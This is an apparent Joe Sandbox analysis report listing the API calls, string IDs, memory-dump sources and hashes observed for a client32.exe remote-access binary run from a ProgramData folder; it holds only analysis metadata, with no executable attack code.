                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                        • String ID: NSMDesktopWnd
                                                                                        • API String ID: 2669163067-206650970
                                                                                        • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                        • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                        • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                        • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                        • API String ID: 47109696-3245241687
                                                                                        • Opcode ID: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                        • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                        • Opcode Fuzzy Hash: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                        • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                        APIs
                                                                                          • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                          • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                          • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                        • API String ID: 806825551-1858614750
                                                                                        • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                        • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                        • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                        • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                        APIs
                                                                                          • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                          • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\x225qa0\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                        • WaitForMultipleObjects.KERNEL32 ref: 11144E25
                                                                                        • ResetEvent.KERNEL32(00000128), ref: 11144E39
                                                                                        • SetEvent.KERNEL32(00000128), ref: 11144E4F
                                                                                        • WaitForMultipleObjects.KERNEL32 ref: 11144E5E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                        • String ID: MiniDump
                                                                                        • API String ID: 1494854734-2840755058
                                                                                        • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                        • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                        • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                        • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32(B24479DC,00000000,00000000,?,00000000,?,11070D57,00000001,?), ref: 111107DA
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,11070D57,00000001,?), ref: 111107E9
                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1111085C
                                                                                          • Part of subcall function 11110430: InitializeCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                          • Part of subcall function 11110430: EnterCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                          • Part of subcall function 11110430: LeaveCriticalSection.KERNEL32(JN,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                        • String ID: ..\ctl32\Refcount.cpp$p.second
                                                                                        • API String ID: 2150084884-3525309832
                                                                                        • Opcode ID: 5d34d5a2f9ef7af3e15489c9f102d339edae3b080d450e09a8618edefa1c9ce3
                                                                                        • Instruction ID: 4a48ad72accfbd502157f99f66ad332c5968b241778b91a05df5760bf403e04f
                                                                                        • Opcode Fuzzy Hash: 5d34d5a2f9ef7af3e15489c9f102d339edae3b080d450e09a8618edefa1c9ce3
                                                                                        • Instruction Fuzzy Hash: 4D21A476E04619AFD711DFA4C881BEFF7B8FB19704F10422AE922A7A80D7346505CBA0
                                                                                        APIs
                                                                                        • LoadStringA.USER32 ref: 111479DF
                                                                                        • wsprintfA.USER32 ref: 11147A16
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                        • API String ID: 1985783259-2296142801
                                                                                        • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                        • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                        • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                        • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                          • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                          • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                        • wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • _memset.LIBCMT ref: 11110207
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                        • API String ID: 3234921582-2664294811
                                                                                        • Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                        • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                        • Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                        • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11031FE6
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                        • String ID: %s%s.bin$506013$clientinv.cpp$m_pDoInv == NULL
                                                                                        • API String ID: 4180936305-4176076045
                                                                                        • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                        • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                        • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                        • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                        • __strdup.LIBCMT ref: 11145277
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                          • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                        • _free.LIBCMT ref: 111452AC
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 398584587-0
                                                                                        • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                        • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                        • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                        • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                        APIs
                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                          • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                        • _free.LIBCMT ref: 1100EE64
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _free.LIBCMT ref: 1100EE77
                                                                                        • _free.LIBCMT ref: 1100EE8A
                                                                                        • _free.LIBCMT ref: 1100EE9D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                        • String ID:
                                                                                        • API String ID: 3515823920-0
                                                                                        • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                        • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                        • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                        • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                        APIs
                                                                                          • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                          • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                          • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                        • wsprintfA.USER32 ref: 1114650E
                                                                                        • wsprintfA.USER32 ref: 11146524
                                                                                          • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                          • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                          • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
